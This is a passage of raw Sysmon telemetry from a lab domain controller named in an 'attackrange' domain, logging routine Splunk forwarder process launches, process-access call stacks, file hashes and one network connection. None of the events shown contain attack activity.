14:02:17.408{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202147Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.408{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E869-6040-1A4E-00000000AD01}5836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202146Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.408{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E869-6040-1A4E-00000000AD01}5836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202145Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:17.409{5ABCFE62-E869-6040-1A4E-00000000AD01}5836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002202174Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:15.026{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60609-false10.0.1.12-8000- 10341000x80000000000000002202173Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.802{5ABCFE62-E86A-6040-1C4E-00000000AD01}59925396C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202172Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.677{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E86A-6040-1C4E-00000000AD01}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202171Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.677{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202170Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.677{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202169Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.677{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202168Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.677{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202167Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.677{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E86A-6040-1C4E-00000000AD01}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202166Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.677{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E86A-6040-1C4E-00000000AD01}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202165Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.678{5ABCFE62-E86A-6040-1C4E-00000000AD01}5992C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202164Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.630{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D4CDE8A9F967DFB5EDF399B50FD3337,SHA256=44EDE22CEF41BCD87DC2D43B7A025F99198661C36C2A4FD55912EC5D64AD410B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202163Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.240{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8834097C579A7E414FCF08D185383011,SHA256=2F819E95A9D66EF7EB4C6546FD09938C1D95C531C7595FB68CC0E7DEBB9986B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202162Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.208{5ABCFE62-E86A-6040-1B4E-00000000AD01}8163864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202161Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.083{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E86A-6040-1B4E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202160Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.083{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202159Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.083{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202158Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.083{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202157Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.083{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202156Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.083{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E86A-6040-1B4E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202155Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.083{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E86A-6040-1B4E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202154Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:18.084{5ABCFE62-E86A-6040-1B4E-00000000AD01}816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202185Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.755{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FBD15E9F07E86CE123D80AB003003DD5,SHA256=C420DB0967CFA63CC8100DBB93A6EAB7C55F7249273DB43154321FCD53C001FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202184Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.646{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=007E1D93190EF092158131DADD3DC9A9,SHA256=99DCCCE97BC7F513B22A3E92FC2906108138B809515F00DE82B778E69D8D6A2F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202183Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.474{5ABCFE62-E86B-6040-1D4E-00000000AD01}61603264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202182Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.349{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E86B-6040-1D4E-00000000AD01}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202181Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.349{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202180Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:02:19.349{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202179Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 